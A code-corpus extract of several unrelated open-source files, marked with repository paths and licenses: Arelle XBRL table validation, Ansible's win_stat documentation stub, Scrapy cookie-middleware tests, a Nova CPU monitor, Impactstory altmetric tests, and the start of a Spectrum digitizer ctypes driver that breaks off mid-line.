XbrlConst.tableBreakdown201301, XbrlConst.tableAxis2011): hasXbrlTables = True # provide context for view if modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE: instance = None # use instance of the entry pont else: # need dummy instance instance = ModelDocument.create(modelXbrl, ModelDocument.Type.INSTANCE, "dummy.xml", # fake URI and fake schemaRef ("http://www.xbrl.org/2003/xbrl-instance-2003-12-31.xsd",)) if hasXbrlTables: # formula processor is needed for 2011 XBRL tables but not for 2010 Eurofiling tables FormulaEvaluator.init() modelXbrl.rendrCntx = XPathContext.create(modelXbrl, instance) modelXbrl.profileStat(None) # setup fresh parameters from formula options modelXbrl.parameters = modelXbrl.modelManager.formulaOptions.typedParameters(modelXbrl.prefixedNamespaces) # validate parameters and custom function signatures ValidateFormula.validate(modelXbrl, xpathContext=modelXbrl.rendrCntx, parametersOnly=True, statusMsg=_("compiling rendering tables")) # deprecated as of 2013-05-17 # check and extract message expressions into compilable programs for msgArcrole in (XbrlConst.tableDefinitionNodeMessage201301, XbrlConst.tableDefinitionNodeSelectionMessage201301, XbrlConst.tableAxisMessage2011, XbrlConst.tableAxisSelectionMessage2011): for msgRel in modelXbrl.relationshipSet(msgArcrole).modelRelationships: ValidateFormula.checkMessageExpressions(modelXbrl, msgRel.toModelObject) # compile and validate tables for modelTable in modelXbrl.modelRenderingTables: modelTable.fromInstanceQnames = None # required if referred to by variables scope chaining modelTable.compile() hasNsWithAspectModel = modelTable.namespaceURI in (XbrlConst.euRend, XbrlConst.table2011, XbrlConst.table201301, XbrlConst.table201305) # check aspectModel (attribute removed 2013-06, now always dimensional) if modelTable.aspectModel not in ("non-dimensional", "dimensional") and hasNsWithAspectModel: modelXbrl.error("xbrlte:unknownAspectModel", _("Table %(xlinkLabel)s, aspect model %(aspectModel)s not recognized"), modelObject=modelTable, xlinkLabel=modelTable.xlinkLabel, aspectModel=modelTable.aspectModel) else: modelTable.priorAspectAxisDisposition = {} # check ordinate aspects against aspectModel oppositeAspectModel = (_DICT_SET({'dimensional','non-dimensional'}) - _DICT_SET({modelTable.aspectModel})).pop() if hasNsWithAspectModel: uncoverableAspects = aspectModels[oppositeAspectModel] - aspectModels[modelTable.aspectModel] else: uncoverableAspects = () aspectsCovered = set() for tblAxisRel in modelXbrl.relationshipSet((XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, XbrlConst.tableBreakdown201301,XbrlConst.tableAxis2011)).fromModelObject(modelTable): breakdownAspectsCovered = set() hasCoveredAspect = checkBreakdownDefinitionNode(modelXbrl, modelTable, tblAxisRel, tblAxisRel.axisDisposition, uncoverableAspects, breakdownAspectsCovered) ''' removed 2013-10 if not hasCoveredAspect: definitionNode = tblAxisRel.toModelObject modelXbrl.error("xbrlte:breakdownDefinesNoAspects", _("Breakdown %(xlinkLabel)s has no participating aspects"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, axis=definitionNode.localName) ''' aspectsCovered |= breakdownAspectsCovered checkBreakdownLeafNodeAspects(modelXbrl, modelTable, tblAxisRel, set(), breakdownAspectsCovered) if Aspect.CONCEPT not in aspectsCovered and not hasNsWithAspectModel: modelXbrl.error("xbrlte:tableMissingConceptAspect", _("Table %(xlinkLabel)s does not include the concept aspect as one of its participating aspects"), modelObject=modelTable, xlinkLabel=modelTable.xlinkLabel) del modelTable.priorAspectAxisDisposition # check for table-parameter name clash parameterNames = {} for tblParamRel in modelXbrl.relationshipSet((XbrlConst.tableParameter, XbrlConst.tableParameterMMDD)).fromModelObject(modelTable): parameterName = tblParamRel.variableQname if parameterName in parameterNames: modelXbrl.error("xbrlte:tableParameterNameClash ", _("Table %(xlinkLabel)s has parameter name clash for variable %(name)s"), modelObject=(modelTable,tblParamRel,parameterNames[parameterName]), xlinkLabel=modelTable.xlinkLabel, name=parameterName) else: parameterNames[parameterName] = tblParamRel modelXbrl.profileStat(_("compileTables")) def checkBreakdownDefinitionNode(modelXbrl, modelTable, tblAxisRel, tblAxisDisposition, uncoverableAspects, aspectsCovered): definitionNode = tblAxisRel.toModelObject hasCoveredAspect = False if isinstance(definitionNode, (ModelDefinitionNode, ModelEuAxisCoord)): for aspect in definitionNode.aspectsCovered(): aspectsCovered.add(aspect) if (aspect in uncoverableAspects or (isinstance(aspect, QName) and modelTable.aspectModel == 'non-dimensional')): modelXbrl.error("xbrlte:axisAspectModelMismatch", _("%(definitionNode)s %(xlinkLabel)s, aspect model %(aspectModel)s, aspect %(aspect)s not allowed"), modelObject=modelTable, definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, aspectModel=modelTable.aspectModel, aspect=str(aspect) if isinstance(aspect,QName) else Aspect.label[aspect]) hasCoveredAspect = True if aspect in modelTable.priorAspectAxisDisposition: otherAxisDisposition, otherDefinitionNode = modelTable.priorAspectAxisDisposition[aspect] if tblAxisDisposition != otherAxisDisposition and aspect != Aspect.DIMENSIONS: modelXbrl.error("xbrlte:aspectClashBetweenBreakdowns", _("%(definitionNode)s %(xlinkLabel)s, aspect %(aspect)s defined on axes of disposition %(axisDisposition)s and %(axisDisposition2)s"), modelObject=(modelTable, definitionNode, otherDefinitionNode), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, axisDisposition=tblAxisDisposition, axisDisposition2=otherAxisDisposition, aspect=str(aspect) if isinstance(aspect,QName) else Aspect.label[aspect]) else: modelTable.priorAspectAxisDisposition[aspect] = (tblAxisDisposition, definitionNode) ruleSetChildren = XmlUtil.children(definitionNode, definitionNode.namespaceURI, "ruleSet") if definitionNode.isMerged: if ruleSetChildren: modelXbrl.error("xbrlte:mergedRuleNodeWithTaggedRuleSet", _("Merged %(definitionNode)s %(xlinkLabel)s has tagged rule set(s)"), modelObject=[modelTable, definitionNode] + ruleSetChildren, definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel) labelRels = modelXbrl.relationshipSet(XbrlConst.elementLabel).fromModelObject(definitionNode) if labelRels: modelXbrl.error("xbrlte:invalidUseOfLabel", _("Merged %(definitionNode)s %(xlinkLabel)s has label(s)"), modelObject=[modelTable, definitionNode] + [r.toModelObject for r in labelRels], definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel) if not definitionNode.isAbstract: modelXbrl.error("xbrlte:nonAbstractMergedRuleNode", _("Merged %(definitionNode)s %(xlinkLabel)s is not abstract"), modelObject=(modelTable, definitionNode), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel) if isinstance(definitionNode, ModelRuleDefinitionNode): tagConstraintSets = {} otherConstraintSet = None # must look at xml constructs for duplicates for ruleSet in XmlUtil.children(definitionNode, definitionNode.namespaceURI, "ruleSet"): tag = ruleSet.tagName if tag is not None: # named constraint sets only for aspect in ruleSet.aspectsCovered(): if aspect != Aspect.DIMENSIONS: modelTable.aspectsInTaggedConstraintSets.add(aspect) if tag in tagConstraintSets: modelXbrl.error("xbrlte:duplicateTag", _("%(definitionNode)s %(xlinkLabel)s duplicate rule set tags %(tag)s"), modelObject=(modelTable, definitionNode, tagConstraintSets[tag], ruleSet), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, tag=tag) else: tagConstraintSets[tag] = ruleSet for tag, constraintSet in definitionNode.constraintSets.items(): if otherConstraintSet is None: otherConstraintSet = constraintSet elif otherConstraintSet.aspectsCovered() != constraintSet.aspectsCovered(): modelXbrl.error("xbrlte:constraintSetAspectMismatch", _("%(definitionNode)s %(xlinkLabel)s constraint set mismatches between %(tag1)s and %(tag2)s in constraints %(aspects)s"), modelObject=(modelTable, definitionNode, otherConstraintSet, constraintSet), definitionNode=definitionNode.localName, xlinkLabel=definitionNode.xlinkLabel, tag1=getattr(otherConstraintSet,"tagName","(no tag)"), tag2=getattr(constraintSet, "tagName", "(no tag)"), aspects=", ".join(aspectStr(aspect) for aspect in otherConstraintSet.aspectsCovered() ^ constraintSet.aspectsCovered() if aspect != Aspect.DIMENSIONS)) if isinstance(definitionNode, ModelDimensionRelationshipDefinitionNode): hasCoveredAspect = True if modelTable.aspectModel == 'non-dimensional': modelXbrl.error("xbrlte:axisAspectModelMismatch", _("DimensionRelationship axis %(xlinkLabel)s can't be used in non-dimensional aspect model"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel) definitionNodeHasChild = False for axisSubtreeRel in modelXbrl.relationshipSet((XbrlConst.tableBreakdownTree, XbrlConst.tableBreakdownTreeMMDD, XbrlConst.tableBreakdownTree201305, XbrlConst.tableDefinitionNodeSubtree, XbrlConst.tableDefinitionNodeSubtreeMMDD, XbrlConst.tableDefinitionNodeSubtree201305, XbrlConst.tableDefinitionNodeSubtree201301, XbrlConst.tableAxisSubtree2011)).fromModelObject(definitionNode): if checkBreakdownDefinitionNode(modelXbrl, modelTable, axisSubtreeRel, tblAxisDisposition, uncoverableAspects, aspectsCovered): hasCoveredAspect = True # something below was covering definitionNodeHasChild = True if isinstance(definitionNode, ModelFilterDefinitionNode): for aspect in definitionNode.aspectsCovered(): if isinstance(aspect, QName): # dimension aspect concept = modelXbrl.qnameConcepts.get(aspect) if concept is None or not concept.isDimensionItem: modelXbrl.error("xbrlte:invalidDimensionQNameOnAspectNode", _("Aspect node %(xlinkLabel)s dimensional aspect %(dimension)s is not a dimension"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, dimension=aspect) if not definitionNodeHasChild: if (definitionNode.namespaceURI in ("http://www.eurofiling.info/2010/rendering", "http://xbrl.org/2011/table") and not hasCoveredAspect): modelXbrl.error("xbrlte:aspectValueNotDefinedByOrdinate", _("%(definitionNode)s %(xlinkLabel)s does not define an aspect"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, definitionNode=definitionNode.localName) if (isinstance(definitionNode, ModelClosedDefinitionNode) and definitionNode.isAbstract): modelXbrl.error("xbrlte:abstractRuleNodeNoChildren", _("Abstract %(definitionNode)s %(xlinkLabel)s has no children"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, definitionNode=definitionNode.localName) return hasCoveredAspect def checkBreakdownLeafNodeAspects(modelXbrl, modelTable, tblAxisRel, parentAspectsCovered, breakdownAspects): definitionNode = tblAxisRel.toModelObject aspectsCovered = parentAspectsCovered.copy() if isinstance(definitionNode, (ModelDefinitionNode, ModelEuAxisCoord)): for aspect in definitionNode.aspectsCovered(): aspectsCovered.add(aspect) definitionNodeHasChild = False for axisSubtreeRel in modelXbrl.relationshipSet((XbrlConst.tableBreakdownTree, XbrlConst.tableBreakdownTreeMMDD, XbrlConst.tableBreakdownTree201305, XbrlConst.tableDefinitionNodeSubtree, XbrlConst.tableDefinitionNodeSubtreeMMDD, XbrlConst.tableDefinitionNodeSubtree201305, XbrlConst.tableDefinitionNodeSubtree201301, XbrlConst.tableAxisSubtree2011)).fromModelObject(definitionNode): checkBreakdownLeafNodeAspects(modelXbrl, modelTable, axisSubtreeRel, aspectsCovered, breakdownAspects) definitionNodeHasChild = True if not definitionNode.isAbstract and not isinstance(definitionNode, ModelBreakdown): # this is a leaf node missingAspects = set(aspect for aspect in breakdownAspects if aspect not in aspectsCovered and aspect != Aspect.DIMENSIONS and not isinstance(aspect,QName)) if (missingAspects): modelXbrl.error("xbrlte:missingAspectValue", _("%(definitionNode)s %(xlinkLabel)s does not define an aspect for %(aspect)s"), modelObject=(modelTable,definitionNode), xlinkLabel=definitionNode.xlinkLabel, definitionNode=definitionNode.localName, aspect=', '.join(aspectStr(aspect) for aspect in missingAspects))
apache-2.0
SteveHNH/ansible
lib/ansible/modules/windows/win_stat.py
26
7647
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # this is a windows documentation stub, actual code lives in the .ps1 # file of the same name ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'core'} DOCUMENTATION = r''' --- module: win_stat version_added: "1.7" short_description: returns information about a Windows file description: - Returns information about a Windows file. - For non-Windows targets, use the M(stat) module instead. options: path: description: - The full path of the file/object to get the facts of; both forward and back slashes are accepted. required: yes get_md5: description: - Whether to return the checksum sum of the file. Between Ansible 1.9 and 2.2 this is no longer an MD5, but a SHA1 instead. As of Ansible 2.3 this is back to an MD5. Will return None if host is unable to use specified algorithm. - This option is deprecated in Ansible 2.3 and is replaced with C(checksum_algorithm=md5). required: no default: True get_checksum: description: - Whether to return a checksum of the file (default sha1) required: no default: True version_added: "2.1" checksum_algorithm: description: - Algorithm to determine checksum of file. Will throw an error if the host is unable to use specified algorithm. required: no default: sha1 choices: ['md5', 'sha1', 'sha256', 'sha384', 'sha512'] version_added: "2.3" notes: - For non-Windows targets, use the M(stat) module instead. author: "Chris Church (@cchurch)" ''' EXAMPLES = r''' - name: Obtain information about a file win_stat: path: C:\foo.ini register: file_info # Obtain information about a folder - win_stat: path: C:\bar register: folder_info # Get MD5 checksum of a file - win_stat: path: C:\foo.ini get_checksum: yes checksum_algorithm: md5 register: md5_checksum - debug: var: md5_checksum.stat.checksum # Get SHA1 checksum of file - win_stat: path: C:\foo.ini get_checksum: yes register: sha1_checksum - debug: var: sha1_checksum.stat.checksum # Get SHA256 checksum of file - win_stat: path: C:\foo.ini get_checksum: yes checksum_algorithm: sha256 register: sha256_checksum - debug: var: sha256_checksum.stat.checksum ''' RETURN = r''' changed: description: Whether anything was changed returned: always type: boolean sample: True stat: description: dictionary containing all the stat data returned: success type: complex contains: attributes: description: attributes of the file at path in raw form returned: success, path exists type: string sample: "Archive, Hidden" checksum: description: The checksum of a file based on checksum_algorithm specified returned: success, path exist, path is a file, get_checksum == True checksum_algorithm specified is supported type: string sample: 09cb79e8fc7453c84a07f644e441fd81623b7f98 creationtime: description: the create time of the file represented in seconds since epoch returned: success, path exists type: float sample: 1477984205.15 exists: description: if the path exists or not returned: success type: boolean sample: True extension: description: the extension of the file at path returned: success, path exists, path is a file type: string sample: ".ps1" filename: description: the name of the file (without path) returned: success, path exists, path is a file type: string sammple: foo.ini isarchive: description: if the path is ready for archiving or not returned: success, path exists type: boolean sample: True isdir: description: if the path is a directory or not returned: success, path exists type: boolean sample: True ishidden: description: if the path is hidden or not returned: success, path exists type: boolean sample: True islnk: description: if the path is a symbolic link or junction or not returned: success, path exists type: boolean sample: True isreadonly: description: if the path is read only or not returned: success, path exists type: boolean sample: True isreg: description: if the path is a regular file returned: success, path exists type: boolean sample: True isshared: description: if the path is shared or not returned: success, path exists type: boolean sample: True lastaccesstime: description: the last access time of the file represented in seconds since epoch returned: success, path exists type: float sample: 1477984205.15 lastwritetime: description: the last modification time of the file represented in seconds since epoch returned: success, path exists type: float sample: 1477984205.15 lnk_source: description: the target of the symbolic link, will return null if not a link or the link is broken return: success, path exists, file is a symbolic link type: string sample: C:\temp md5: description: The MD5 checksum of a file (Between Ansible 1.9 and 2.2 this was returned as a SHA1 hash) returned: success, path exist, path is a file, get_md5 == True, md5 is supported type: string sample: 09cb79e8fc7453c84a07f644e441fd81623b7f98 owner: description: the owner of the file returned: success, path exists type: string sample: BUILTIN\Administrators path: description: the full absolute path to the file returned: success, path exists, file exists type: string sample: C:\foo.ini sharename: description: the name of share if folder is shared returned: success, path exists, file is a directory and isshared == True type: string sample: file-share size: description: the size in bytes of a file or folder returned: success, path exists, file is not a link type: int sample: 1024 '''
gpl-3.0
moraesnicol/scrapy
tests/test_downloadermiddleware_cookies.py
116
10382
import re import logging from unittest import TestCase from testfixtures import LogCapture from scrapy.http import Response, Request from scrapy.spiders import Spider from scrapy.utils.test import get_crawler from scrapy.exceptions import NotConfigured from scrapy.downloadermiddlewares.cookies import CookiesMiddleware class CookiesMiddlewareTest(TestCase): def assertCookieValEqual(self, first, second, msg=None): cookievaleq = lambda cv: re.split(';\s*', cv.decode('latin1')) return self.assertEqual( sorted(cookievaleq(first)), sorted(cookievaleq(second)), msg) def setUp(self): self.spider = Spider('foo') self.mw = CookiesMiddleware() def tearDown(self): del self.mw def test_basic(self): req = Request('http://scrapytest.org/') assert self.mw.process_request(req, self.spider) is None assert 'Cookie' not in req.headers headers = {'Set-Cookie': 'C1=value1; path=/'} res = Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/sub1/') assert self.mw.process_request(req2, self.spider) is None self.assertEquals(req2.headers.get('Cookie'), b"C1=value1") def test_setting_false_cookies_enabled(self): self.assertRaises( NotConfigured, CookiesMiddleware.from_crawler, get_crawler(settings_dict={'COOKIES_ENABLED': False}) ) def test_setting_default_cookies_enabled(self): self.assertIsInstance( CookiesMiddleware.from_crawler(get_crawler()), CookiesMiddleware ) def test_setting_true_cookies_enabled(self): self.assertIsInstance( CookiesMiddleware.from_crawler( get_crawler(settings_dict={'COOKIES_ENABLED': True}) ), CookiesMiddleware ) def test_setting_enabled_cookies_debug(self): crawler = get_crawler(settings_dict={'COOKIES_DEBUG': True}) mw = CookiesMiddleware.from_crawler(crawler) with LogCapture('scrapy.downloadermiddlewares.cookies', propagate=False, level=logging.DEBUG) as l: req = Request('http://scrapytest.org/') res = Response('http://scrapytest.org/', headers={'Set-Cookie': 'C1=value1; path=/'}) mw.process_response(req, res, crawler.spider) req2 = Request('http://scrapytest.org/sub1/') mw.process_request(req2, crawler.spider) l.check( ('scrapy.downloadermiddlewares.cookies', 'DEBUG', 'Received cookies from: <200 http://scrapytest.org/>\n' 'Set-Cookie: C1=value1; path=/\n'), ('scrapy.downloadermiddlewares.cookies', 'DEBUG', 'Sending cookies to: <GET http://scrapytest.org/sub1/>\n' 'Cookie: C1=value1\n'), ) def test_setting_disabled_cookies_debug(self): crawler = get_crawler(settings_dict={'COOKIES_DEBUG': False}) mw = CookiesMiddleware.from_crawler(crawler) with LogCapture('scrapy.downloadermiddlewares.cookies', propagate=False, level=logging.DEBUG) as l: req = Request('http://scrapytest.org/') res = Response('http://scrapytest.org/', headers={'Set-Cookie': 'C1=value1; path=/'}) mw.process_response(req, res, crawler.spider) req2 = Request('http://scrapytest.org/sub1/') mw.process_request(req2, crawler.spider) l.check() def test_do_not_break_on_non_utf8_header(self): req = Request('http://scrapytest.org/') assert self.mw.process_request(req, self.spider) is None assert 'Cookie' not in req.headers headers = {'Set-Cookie': b'C1=in\xa3valid; path=/', 'Other': b'ignore\xa3me'} res = Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/sub1/') assert self.mw.process_request(req2, self.spider) is None self.assertIn('Cookie', req2.headers) def test_dont_merge_cookies(self): # merge some cookies into jar headers = {'Set-Cookie': 'C1=value1; path=/'} req = Request('http://scrapytest.org/') res = Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res # test Cookie header is not seted to request req = Request('http://scrapytest.org/dontmerge', meta={'dont_merge_cookies': 1}) assert self.mw.process_request(req, self.spider) is None assert 'Cookie' not in req.headers # check that returned cookies are not merged back to jar res = Response('http://scrapytest.org/dontmerge', headers={'Set-Cookie': 'dont=mergeme; path=/'}) assert self.mw.process_response(req, res, self.spider) is res # check that cookies are merged back req = Request('http://scrapytest.org/mergeme') assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'C1=value1') # check that cookies are merged when dont_merge_cookies is passed as 0 req = Request('http://scrapytest.org/mergeme', meta={'dont_merge_cookies': 0}) assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'C1=value1') def test_complex_cookies(self): # merge some cookies into jar cookies = [{'name': 'C1', 'value': 'value1', 'path': '/foo', 'domain': 'scrapytest.org'}, {'name': 'C2', 'value': 'value2', 'path': '/bar', 'domain': 'scrapytest.org'}, {'name': 'C3', 'value': 'value3', 'path': '/foo', 'domain': 'scrapytest.org'}, {'name': 'C4', 'value': 'value4', 'path': '/foo', 'domain': 'scrapy.org'}] req = Request('http://scrapytest.org/', cookies=cookies) self.mw.process_request(req, self.spider) # embed C1 and C3 for scrapytest.org/foo req = Request('http://scrapytest.org/foo') self.mw.process_request(req, self.spider) assert req.headers.get('Cookie') in (b'C1=value1; C3=value3', b'C3=value3; C1=value1') # embed C2 for scrapytest.org/bar req = Request('http://scrapytest.org/bar') self.mw.process_request(req, self.spider) self.assertEquals(req.headers.get('Cookie'), b'C2=value2') # embed nothing for scrapytest.org/baz req = Request('http://scrapytest.org/baz') self.mw.process_request(req, self.spider) assert 'Cookie' not in req.headers def test_merge_request_cookies(self): req = Request('http://scrapytest.org/', cookies={'galleta': 'salada'}) assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'galleta=salada') headers = {'Set-Cookie': 'C1=value1; path=/'} res = Response('http://scrapytest.org/', headers=headers) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/sub1/') assert self.mw.process_request(req2, self.spider) is None self.assertCookieValEqual(req2.headers.get('Cookie'), b"C1=value1; galleta=salada") def test_cookiejar_key(self): req = Request('http://scrapytest.org/', cookies={'galleta': 'salada'}, meta={'cookiejar': "store1"}) assert self.mw.process_request(req, self.spider) is None self.assertEquals(req.headers.get('Cookie'), b'galleta=salada') headers = {'Set-Cookie': 'C1=value1; path=/'} res = Response('http://scrapytest.org/', headers=headers, request=req) assert self.mw.process_response(req, res, self.spider) is res req2 = Request('http://scrapytest.org/', meta=res.meta) assert self.mw.process_request(req2, self.spider) is None self.assertCookieValEqual(req2.headers.get('Cookie'), b'C1=value1; galleta=salada') req3 = Request('http://scrapytest.org/', cookies={'galleta': 'dulce'}, meta={'cookiejar': "store2"}) assert self.mw.process_request(req3, self.spider) is None self.assertEquals(req3.headers.get('Cookie'), b'galleta=dulce') headers = {'Set-Cookie': 'C2=value2; path=/'} res2 = Response('http://scrapytest.org/', headers=headers, request=req3) assert self.mw.process_response(req3, res2, self.spider) is res2 req4 = Request('http://scrapytest.org/', meta=res2.meta) assert self.mw.process_request(req4, self.spider) is None self.assertCookieValEqual(req4.headers.get('Cookie'), b'C2=value2; galleta=dulce') #cookies from hosts with port req5_1 = Request('http://scrapytest.org:1104/') assert self.mw.process_request(req5_1, self.spider) is None headers = {'Set-Cookie': 'C1=value1; path=/'} res5_1 = Response('http://scrapytest.org:1104/', headers=headers, request=req5_1) assert self.mw.process_response(req5_1, res5_1, self.spider) is res5_1 req5_2 = Request('http://scrapytest.org:1104/some-redirected-path') assert self.mw.process_request(req5_2, self.spider) is None self.assertEquals(req5_2.headers.get('Cookie'), b'C1=value1') req5_3 = Request('http://scrapytest.org/some-redirected-path') assert self.mw.process_request(req5_3, self.spider) is None self.assertEquals(req5_3.headers.get('Cookie'), b'C1=value1') #skip cookie retrieval for not http request req6 = Request('file:///scrapy/sometempfile') assert self.mw.process_request(req6, self.spider) is None self.assertEquals(req6.headers.get('Cookie'), None) def test_local_domain(self): request = Request("http://example-host/", cookies={'currencyCookie': 'USD'}) assert self.mw.process_request(request, self.spider) is None self.assertIn('Cookie', request.headers) self.assertEqual(b'currencyCookie=USD', request.headers['Cookie'])
bsd-3-clause
sajeeshcs/nested_quota_final
nova/compute/monitors/cpu_monitor.py
63
2132
# Copyright 2013 Intel Corporation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ CPU monitor to retrieve CPU information """ from nova.compute import monitors class _CPUMonitorBase(monitors.ResourceMonitorBase): """CPU monitor base.""" def _get_cpu_frequency(self, **kwargs): """Return CPU current frequency and its timestamp.""" return None, None def _get_cpu_user_time(self, **kwargs): """Return CPU user mode time and its timestamp.""" return None, None def _get_cpu_kernel_time(self, **kwargs): """Return CPU kernel time and its timestamp.""" return None, None def _get_cpu_idle_time(self, **kwargs): """Return CPU idle time and its timestamp.""" return None, None def _get_cpu_iowait_time(self, **kwargs): """Return CPU I/O wait time and its timestamp.""" return None, None def _get_cpu_user_percent(self, **kwargs): """Return CPU user mode percentage and its timestamp.""" return None, None def _get_cpu_kernel_percent(self, **kwargs): """Return CPU kernel percentage and its timestamp.""" return None, None def _get_cpu_idle_percent(self, **kwargs): """Return CPU idle percentage and its timestamp.""" return None, None def _get_cpu_iowait_percent(self, **kwargs): """Return CPU I/O wait percentage and its timestamp.""" return None, None def _get_cpu_percent(self, **kwargs): """Return generic CPU utilization and its timestamp.""" return None, None
apache-2.0
Impactstory/total-impact-webapp
test/unit_tests/providers/test_altmetric_com.py
2
3833
from test.unit_tests.providers import common from test.unit_tests.providers.common import ProviderTestCase from totalimpact.providers.provider import Provider, ProviderContentMalformedError from test.utils import http import os import collections import pprint from nose.tools import assert_equals, assert_items_equal, raises, nottest datadir = os.path.join(os.path.split(__file__)[0], "../../../extras/sample_provider_pages/altmetric_com") SAMPLE_EXTRACT_ALIASES_PAGE = os.path.join(datadir, "aliases") SAMPLE_EXTRACT_METRICS_PAGE = os.path.join(datadir, "metrics") SAMPLE_EXTRACT_METRICS_PAGE_EXTENDED = os.path.join(datadir, "sample.json") TEST_ID = "10.1101/gr.161315.113" class TestAltmetric_Com(ProviderTestCase): provider_name = "altmetric_com" testitem_aliases = ("doi", TEST_ID) testitem_metrics = ("doi", TEST_ID) def setUp(self): ProviderTestCase.setUp(self) def test_is_relevant_alias(self): # ensure that it matches an appropriate ids assert_equals(self.provider.is_relevant_alias(self.testitem_aliases), True) def test_extract_aliases_success(self): f = open(SAMPLE_EXTRACT_ALIASES_PAGE, "r") good_page = f.read() aliases_list = self.provider._extract_aliases(good_page) expected = [('altmetric_com', '1870595')] assert_equals(aliases_list, expected) def test_extract_metrics_success_via_fetch(self): f = open(SAMPLE_EXTRACT_METRICS_PAGE_EXTENDED, "r") good_page = f.read() metrics_dict = self.provider._extract_metrics_via_fetch(good_page) print metrics_dict.keys() expected_keys = ['altmetric_com:demographics', 'altmetric_com:tweets', 'altmetric_com:unique_tweeters', 'altmetric_com:posts'] assert_items_equal(expected_keys, metrics_dict.keys()) assert_equals(metrics_dict["altmetric_com:tweets"], 2235) def test_provenance_url(self): provenance_url = self.provider.provenance_url("tweets", [self.testitem_aliases]) expected = "" assert_equals(provenance_url, expected) provenance_url = self.provider.provenance_url("tweets", [self.testitem_aliases, ("altmetric_com", "1870595")]) expected = 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org' assert_equals(provenance_url, expected) @http def test_aliases(self): aliases = self.provider.aliases([self.testitem_aliases]) print aliases expected = [('altmetric_com', '1870595')] assert_equals(aliases, expected) @http def test_metrics(self): metrics_dict = self.provider.metrics([("altmetric_com", "1870595")]) expected = {'altmetric_com:gplus_posts': (1, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org'), 'altmetric_com:facebook_posts': (1, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org'), 'altmetric_com:tweets': (55, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org'), 'altmetric_com:blog_posts': (2, 'http://www.altmetric.com/details.php?citation_id=1870595&src=impactstory.org')} print metrics_dict for key in expected: assert metrics_dict[key][0] >= expected[key][0], [key, metrics_dict[key], expected[key]] assert metrics_dict[key][1] == expected[key][1], [key, metrics_dict[key], expected[key]] def test_provider_aliases_400(self): pass def test_provider_aliases_500(self): pass def test_provider_metrics_400(self): pass def test_provider_metrics_500(self): pass def test_provider_metrics_empty(self): pass def test_provider_metrics_nonsense_txt(self): pass def test_provider_metrics_nonsense_xml(self): pass
mit
vdrhtc/Measurement-automation
drivers/pyspcm.py
1
7735
import os import platform import sys from ctypes import * # load registers for easier access from drivers.py_header.regs import * # load registers for easier access from drivers.py_header.spcerr import * SPCM_DIR_PCTOCARD = 0 SPCM_DIR_CARDTOPC = 1 SPCM_BUF_DATA = 1000 # main data buffer for acquired or generated samples SPCM_BUF_ABA = 2000 # buffer for ABA data, holds the A-DATA (slow samples) SPCM_BUF_TIMESTAMP = 3000 # buffer for timestamps # determine bit width of os oPlatform = platform.architecture() if (oPlatform[0] == '64bit'): bIs64Bit = 1 else: bIs64Bit = 0 # define pointer aliases int8 = c_int8 int16 = c_int16 int32 = c_int32 int64 = c_int64 ptr8 = POINTER (int8) ptr16 = POINTER (int16) ptr32 = POINTER (int32) ptr64 = POINTER (int64) uint8 = c_uint8 uint16 = c_uint16 uint32 = c_uint32 uint64 = c_uint64 uptr8 = POINTER (uint8) uptr16 = POINTER (uint16) uptr32 = POINTER (uint32) uptr64 = POINTER (uint64) # Windows if os.name == 'nt': #sys.stdout.write("Python Version: {0} on Windows\n\n".format ( # platform.python_version())) # define card handle type if (bIs64Bit): # for unknown reasons c_void_p gets messed up on Win7/64bit, but this works: drv_handle = POINTER(c_uint64) else: drv_handle = c_void_p # Load DLL into memory. # use windll because all driver access functions use _stdcall calling convention under windows if (bIs64Bit == 1): spcmDll = windll.LoadLibrary ("c:\\windows\\system32\\spcm_win64.dll") else: spcmDll = windll.LoadLibrary ("c:\\windows\\system32\\spcm_win32.dll") # load spcm_hOpen if (bIs64Bit): spcm_hOpen = getattr (spcmDll, "spcm_hOpen") else: spcm_hOpen = getattr (spcmDll, "_spcm_hOpen@4") spcm_hOpen.argtype = 